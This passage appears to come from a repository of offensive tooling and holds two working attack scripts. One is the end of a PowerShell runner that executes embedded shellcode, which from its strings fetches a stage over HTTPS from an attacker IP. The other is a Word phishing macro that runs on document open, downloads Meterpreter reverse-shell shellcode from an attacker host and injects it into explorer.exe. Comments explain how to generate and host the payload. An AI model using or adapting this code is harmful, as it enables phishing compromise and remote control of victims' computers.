47 | [Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0x50,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,0x7,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xf,0x0,0x0,0x0,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x34,0x39,0x2e,0x31,0x32,0x30,0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x1,0x0,0x0,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x3,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0x21,0x0,0x0,0x0,0x2f,0x45,0x53,0x62,0x45,0x53,0x4b,0x61,0x73,0x59,0x6e,0x6d,0x6a,0x6c,0x4b,0x4b,0x57,0x78,0x4d,0x7a,0x51,0x59,0x51,0x64,0x62,0x59,0x6e,0x66,0x79,0x52,0x78,0x44,0x0,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x0,0x32,0xa8,0x84,0x0,0x0,0x0,0x0,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0xa,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x0,0x0,0x49,0x89,0xe0,0x6a,0x4,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x0,0x0,0x0,0x0,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x0,0x0,0x49,0xba,0x44,0xf0,0x35,0xe0,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0xff,0xcf,0x74,0x2,0xeb,0xaa,0xe8,0x55,0x0,0x0,0x0,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x0,0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5
48 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
49 | 
50 | # Execute shellcode and wait for it to exit
51 | $hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),
52 |   (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
53 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),
54 |   (getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)
55 | 


--------------------------------------------------------------------------------
/Phishing/Word/msfhex_inject.vba:
--------------------------------------------------------------------------------
  1 | ' For 32bit installs of office
  2 | ' Generate hex shellcode with
  3 | ' msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 EXITFUNC=thread -f hex > shellcode.txt
  4 | ' Host with https://github.com/beauknowstech/gup
  5 | ' Or python3 -m http.server
  6 | ' Don't forget to change the URL on line 87
  7 | ' You can also change the process it injects into on line 99 if you know for sure a different 32-bit process will be running
  8 | 
  9 | 
 10 | Private Declare PtrSafe Function OpenProcess Lib "kernel32" ( _
 11 |     ByVal dwDesiredAccess As Long, _
 12 |     ByVal bInheritHandle As Long, _
 13 |     ByVal dwProcessId As Long) As LongPtr
 14 | 
 15 | Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" ( _
 16 |     ByVal hProcess As LongPtr, _
 17 |     ByVal lpAddress As LongPtr, _
 18 |     ByVal dwSize As LongPtr, _
 19 |     ByVal flAllocationType As Long, _
 20 |     ByVal flProtect As Long) As LongPtr
 21 | 
 22 | Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" ( _
 23 |     ByVal hProcess As LongPtr, _
 24 |     ByVal lpBaseAddress As LongPtr, _
 25 |     ByRef lpBuffer As Any, _
 26 |     ByVal nSize As LongPtr, _
 27 |     ByRef lpNumberOfBytesWritten As LongPtr) As Long
 28 | 
 29 | Private Declare PtrSafe Function CreateRemoteThread Lib "kernel32" ( _
 30 |     ByVal hProcess As LongPtr, _
 31 |     ByVal lpThreadAttributes As LongPtr, _
 32 |     ByVal dwStackSize As LongPtr, _
 33 |     ByVal lpStartAddress As LongPtr, _
 34 |     ByVal lpParameter As LongPtr, _
 35 |     ByVal dwCreationFlags As Long, _
 36 |     ByRef lpThreadId As LongPtr) As LongPtr
 37 | 
 38 | Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
 39 |     ByVal hObject As LongPtr) As Long
 40 | 
 41 | Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" ( _
 42 |     ByVal dwFlags As Long, _
 43 |     ByVal th32ProcessID As Long) As LongPtr
 44 | 
 45 | Private Declare PtrSafe Function Process32First Lib "kernel32" ( _
 46 |     ByVal hSnapshot As LongPtr, _
 47 |     ByRef lppe As PROCESSENTRY32) As Long
 48 | 
 49 | Private Declare PtrSafe Function Process32Next Lib "kernel32" ( _
 50 |     ByVal hSnapshot As LongPtr, _
 51 |     ByRef lppe As PROCESSENTRY32) As Long
 52 | 
 53 | Private Declare PtrSafe Function lstrlenW Lib "kernel32" ( _
 54 |     ByVal lpString As LongPtr) As Long
 55 | 
 56 | Private Type PROCESSENTRY32
 57 |     dwSize As Long
 58 |     cntUsage As Long
 59 |     th32ProcessID As Long
 60 |     th32DefaultHeapID As LongPtr
 61 |     th32ModuleID As Long
 62 |     cntThreads As Long
 63 |     th32ParentProcessID As Long
 64 |     pcPriClassBase As Long
 65 |     dwFlags As Long
 66 |     szExeFile As String * 260
 67 | End Type
 68 | 
 69 | Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
 70 | Private Const MEM_COMMIT As Long = &H1000
 71 | Private Const MEM_RESERVE As Long = &H2000
 72 | Private Const PAGE_EXECUTE_READWRITE As Long = &H40
 73 | Private Const TH32CS_SNAPPROCESS As Long = &H2
 74 | 
 75 | Sub AutoOpen()
 76 |     ' This macro runs when the document is opened
 77 | 
 78 |     Dim http As Object
 79 |     Dim shellcode As String
 80 |     Dim shellcodeBytes() As Byte
 81 |     Dim targetProcessId As Long
 82 |     Dim hProcess As LongPtr
 83 |     Dim memAddr As LongPtr
 84 | 
 85 |     ' URL of the shellcode (as a hex string)
 86 |     Dim url As String
 87 |     url = "http://192.168.52.130/shellcode.txt" ' Replace with your IP
 88 | 
 89 |     ' Download the shellcode using MSXML2.XMLHTTP
 90 |     Set http = CreateObject("MSXML2.XMLHTTP")
 91 |     http.Open "GET", url, False
 92 |     http.Send
 93 |     shellcode = http.responseText
 94 |     
 95 |     ' Convert the hex shellcode to a byte array
 96 |     shellcodeBytes = HexStringToByteArray(shellcode)
 97 |     
 98 |     ' Find the target process by name (e.g., explorer.exe)
 99 |     targetProcessId = FindProcessIdByName("explorer.exe") ' You can change this to notepad.exe for testing
100 | 
101 |     If targetProcessId = 0 Then
102 |         MsgBox "Target process not found!"
103 |         Exit Sub
104 |     End If
105 |     
106 |     ' Open the target process with all access
107 |     hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, targetProcessId)
108 |     
109 |     If hProcess = 0 Then
110 |         MsgBox "Failed to open target process!"
111 |         Exit Sub
112 |     End If
113 |     
114 |     ' Allocate memory in the target process
115 |     memAddr = VirtualAllocEx(hProcess, 0, UBound(shellcodeBytes) - LBound(shellcodeBytes) + 1, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
116 |     
117 |     If memAddr = 0 Then
118 |         MsgBox "Memory allocation in target process failed!"
119 |         CloseHandle (hProcess)
120 |         Exit Sub
121 |     End If
122 | 
123 |     ' Write the shellcode to the target process
124 |     Dim bytesWritten As LongPtr
125 |     WriteProcessMemory hProcess, memAddr, shellcodeBytes(LBound(shellcodeBytes)), UBound(shellcodeBytes) - LBound(shellcodeBytes) + 1, bytesWritten
126 | 
127 |     If bytesWritten = 0 Then
128 |         MsgBox "Failed to write shellcode to the target process!"
129 |         CloseHandle (hProcess)
130 |         Exit Sub
131 |     End If
132 |     
133 |     ' Create a remote thread in the target process to execute the shellcode
134 |     Dim hThread As LongPtr
135 |     hThread = CreateRemoteThread(hProcess, 0, 0, memAddr, 0, 0, 0)
136 | 
137 |     If hThread = 0 Then
138 |         MsgBox "Failed to create remote thread!"
139 |         CloseHandle (hProcess)
140 |         Exit Sub
141 |     End If
142 | 
143 |     ' Close the handles
144 |     CloseHandle (hThread)
145 |     CloseHandle (hProcess)
146 | 
147 |     MsgBox "Shellcode injected and executed in target process."
148 | End Sub
149 | 
150 | Function FindProcessIdByName(processName As String) As Long
151 |     ' Finds the process ID of a process by its executable name
152 |     Dim hSnapshot As LongPtr
153 |     Dim pe32 As PROCESSENTRY32
154 |     Dim processId As Long
155 | 
156 |     hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
157 |     If hSnapshot = 0 Then
158 |         FindProcessIdByName = 0
159 |         Exit Function
160 |     End If
161 | 
162 |     pe32.dwSize = Len(pe32)
163 |     If Process32First(hSnapshot, pe32) = 0 Then
164 |         CloseHandle hSnapshot
165 |         FindProcessIdByName = 0
166 |         Exit Function
167 |     End If
168 | 
169 |     Do
170 |         ' Check if this is the process we're looking for
171 |         If InStr(1, pe32.szExeFile, processName, vbTextCompare) > 0 Then
172 |             processId = pe32.th32ProcessID
173 |             Exit Do
174 |         End If
175 |     Loop While Process32Next(hSnapshot, pe32)
176 | 
177 |     CloseHandle hSnapshot
178 |     FindProcessIdByName = processId
179 | End Function
180 | 
181 | Function HexStringToByteArray(hexString As String) As Byte()
182 |     ' Converts a hex-encoded string to a byte array
183 |     Dim bytes() As Byte
184 |     Dim i As Long
185 |     Dim length As Long
186 | 
187 |     length = Len(hexString) \ 2
188 |     ReDim bytes(length - 1)
189 | 
190 |     For i = 0 To length - 1
191 |         bytes(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))
192 |     Next i
193 | 
194 |     HexStringToByteArray = bytes
195 | End Function


--------------------------------------------------------------------------------